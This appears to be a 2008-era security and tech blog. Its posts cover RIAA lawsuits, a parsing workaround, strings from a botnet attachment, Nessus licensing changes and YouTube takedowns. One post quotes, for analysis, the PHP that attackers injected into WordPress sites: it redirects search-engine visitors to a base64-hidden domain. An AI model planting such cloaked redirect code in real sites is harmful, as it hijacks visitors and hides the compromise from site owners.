RIAA files suit against hospitalized teenager and wins

According to various reports [1,2,3] the RIAA won a lawsuit against Ciara Sauro due to her inability to respond to court documents in a timely fashion. The unnamed judge has rendered a verdict in the amount of $8,000. This case was brought by the RIAA over 10 songs.

Why RIAA tactics are unconstitutional

Charlie Nesson explains in this article just how far the RIAA has perverted the American legal system.
It should be noted the $750 statutory minimum is just that. A minimum. It can go as high as $30,000 per infringement.
The defendant in this trial has had to endure 7 years of legal troubles over allegedly downloading 7 songs. This is something to think about. The RIAA is asking for over $1M because of downloaded songs which have a market value of roughly $7. I have to agree with Paula Samuelson that at most damages of 3x should apply to crimes of this nature. Not only is this proportional to the actual crime but would force RIAA to go after higher stakes players who are actually reproducing physical copies of CDs.

A summarized version exists here.

Hpricot Workaround for ASPX viewstate

I’ve switched over to Hpricot for HTML parsing in my various ruby projects. This was a long time coming and the performance is impressive. I happened to catch a page with ASPX viewstate on it and was faced with the following error:

ran out of buffer space on element

There are various pages out there which detail the work around and the rumor is that the memory cap is to ensure that the script doesn’t end up consuming everything on the machine. The work around is as follows:

Hpricot.buffer_size = 262144

Federal Judge holds that people can not be identified by IP address

Judge Nancy Gertner held that a person can not be readily identified merely by an IP address with any “reasonable degree of technical certainty”. This is something that most of the technical community has claimed for years as the RIAA made countless fishing expeditions using universities as unwitting accomplices. It is refreshing to see a judge at the Federal level understand this concept.

“[T]he Court finds that compliance with the subpoena as to the IP addresses represented by these Defendants would expose innocent parties to intrusive discovery,”

Crime does occur on the Internet. However for the last few years many of us have watched with horror as the RIAA violated due process and reasonable expectations of privacy while trying to prosecute these crimes. It is hoped by this author that in the near future the RIAA will conform to the laws of this country by using actual law enforcement instead of unlicensed private investigators and petitioning the court with actual evidence instead of the equivalent of a “lead”.

Clearly the weight of the judicial system is starting to tilt back in favor of the people but it is too soon to celebrate. No judge has yet stepped up to declare 17 U.S.C. § 504(c)(2) to be unconstitutional. With maximum statutory damages set at $30,000 per infringement the defendants absolutely must have representation in the courts. Yet the RIAA end run around this crucial aspect perverts that which is “fundamental to the American scheme of justice.”

hi, botnet Jack here

I received what was obviously spam this morning with the subject “VideoTube.com: The Best!”
Because I work on the Youtomb project this sort of caught my attention. The message simply read “eX-eX-eX girlfriend!” and there was a zipped attachment. I detached the file and moved it to one of my test boxes. Once there I unzipped it and ran “strings” on it.

It is definitely some sort of windows based botnet package but I don’t have the time to really investigate it. Leaving behind the strings output to help anyone who runs into this today or in the near future. The first line of intelligible strings output did make me laugh

hi, botnet Jack here
CloseHandle
CreateProcessA
ExitProcess
GetEnvironmentVariableA
GetModuleFileNameA
GetShortPathNameA
GetThreadContext
ReadProcessMemory
ResumeThread
SetThreadContext
VirtualAllocEx
WriteProcessMemory
lstrcatA
lstrcpyA
KERNEL32.dll

MBTA security fail

In light of the events of last week I couldn’t help but be amused by this dialog box floating on a turnstile display in the central square T stop.

EDIT: my cell phone camera takes lousy pictures. The text reads:
Program: D:/FOAAA/
File: sprintf.c
Line: 94

sprintf.c

WordPress 2.5.0 and 2.5.1 vulnerable to attack

Thanks to co-author Brandon Palmen for the heads up to a WordPress hack in progress. The attackers are using a few obfuscation tricks to inject code into WordPress installations using a recently announced vulnerability. More details in a well written write up here.

The code snippets from a digitalpoint.com forum are shown using base64 encoding to hide the true destination:


<php>
$seref=array("google","msn",
"live","altavista","ask",
"yahoo","aol","cnn",
"weather","alexa");

$ser=0;
foreach($seref as $ref)

if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
{ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0)
{
header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
exit;
}
></php>

This code shows yet another trend we’ve noticed at stopbadware.org of only exploiting those requests which come directly from a search engine. We can only conclude this is to prevent (or delay) detection and maximize infection duration.

Chinese hackers political assault on the blogosphere

Disturbing news of a hacked blogger in China. This is not a simple DBD setup involving iframes. This was a highly targeted and politically motivated attack. The attackers not only posted a personal picture of her with instructions for viewers to assault her on the street but managed to infiltrate her Skype account.

Tenable alters Nessus plug-in licensing. Still not Open

Dear Nessus Community,

On behalf of Tenable Network Security, we would like to thank you for making Tenable’s Nessus®
vulnerability scanner the most widely used scanner in the world. Over the last five years, we have seen
Nessus grow globally to over 5 million downloads and we have been there every step of the way. The core
Nessus engine is powered by our world-class vulnerability research content which includes over 20,000
plugins, enhanced features such as IPv6 scanning, free mailing lists, online search tools and free clients.
Nessus has become not only a popular tool for conducting security audits but we have extended its
capabilities to conduct agent-less patch audits and configuration audits, as well as locating sensitive data.
Looking forward, we plan to further increase functionality, such as SMBv2 support to better audit Windows
2008 and Windows Vista, and further expand our abilities to conduct even more comprehensive vulnerability
and configuration audits.

In the process, the Nessus scanning engine has been provided to our rapidly growing community as a free
download with research content licensed through two plugin subscriptions. Our Nessus users know these as
the “Registered Feed” and the “Direct Feed” subscriptions. These subscriptions have been available for over
three years and have been utilized by countless individuals, consultants, companies, governments and other
organizations.

We continually interact with the Nessus community and review our capabilities to ensure Nessus continues
to meet and exceed the needs of its users. Since creating and releasing the subscriptions, two distinct user
groups emerged. They are the home user and the commercial user. To better reflect the needs our
community, we have decided to update our Subscription licensing policy and are announcing the planned
change (as outlined below and accompanied by a FAQ) that will go into effect on July 31st, 2008.

First, we will continue to enable all users to download Nessus for free.

Second, due to computers and personal networks having become ubiquitous in homes around the
world, Tenable will launch a “HomeFeed” with all Nessus vulnerability plugin updates for home users
at no charge and with no delay. We are excited to offer the latest vulnerability checks for
personal, non-commercial use and strongly encourage home users to audit their computers and
networks for the newest security flaws.

Finally, Tenable’s “Direct Feed” will be re-named to the “ProfessionalFeed” and the “Registered Feed”
will be discontinued. The ProfessionalFeed will entitle subscribers to the latest vulnerability and
patch audits, configuration and content audits and commercial support for their Nessus 3
installation. The ProfessionalFeed will serve as Tenable’s commercial subscription and will be
required for individuals and organizations that want to use Tenable’s Nessus plugins commercially.

The decision to alter the licensing policy is the result of significant deliberation and will benefit both home
users and commercial users. The change will ensure our ability to invest in the future roadmap for Nessus
and to expand our research, support and training capabilities to serve our growing community. We realize
this may affect some individuals, corporations and organizations that use the currently available “Registered
Feed” in production audits and commercial services. Because of this, Tenable is offering a 25 percent rebate
for the Direct Feed subscription service (normally available at $1200 per year), beginning May 14, 2008 until
July 31, 2008 only when purchased through Tenable’s e-commerce site.
Additionally, we understand that there are those in the Nessus community that serve broad social and
educational objectives and we want to make certain that qualified charitable and information security
teaching/training organizations have access to the ProfessionalFeed free of charge. To this end, Tenable will
provide ProfessionalFeed subscriptions to charity and teaching/training organizations at no cost for those
that qualify.
As always, Tenable will continue to perform the in-depth research, testing and development to keep Nessus
the leading vulnerability and network auditing tool available to both home and professional users.

excerpt directly from Tenable Network Security, Inc.

Anti Scientology Videos taken down en masse on Youtube

The other day I received an email about a new Anonymous vs. Scientology dispute on Youtube. The enterbulation forum reported that Tory Christman, a very vocal critic of Scientology, had her Youtube account suspended. This time it looks as though Mark Bunker (wise beard man) has had many of his videos taken down as Terms of Service violations. Roughly 90 of his videos appear to be down at this time. You can view these takedowns as we discover them at Youtomb
[disclosure: I am an active team member of the Youtomb project]
[update: the enterbulation forum has also confirmed this account suspension on the same thread on page 21]

I’ve created a CSV of the videos affected here.
Because WordPress won’t let me upload .CSV I have named the file .txt. Rename it to .CSV and use your favorite spreadsheet software to view it.

Given the history of Mark Bunker one has to wonder what Scientology told Youtube in order to have his account shutdown. As one can see from the data collected all the public is told is that there was a Terms of Service violation. we have no idea what those violations might be.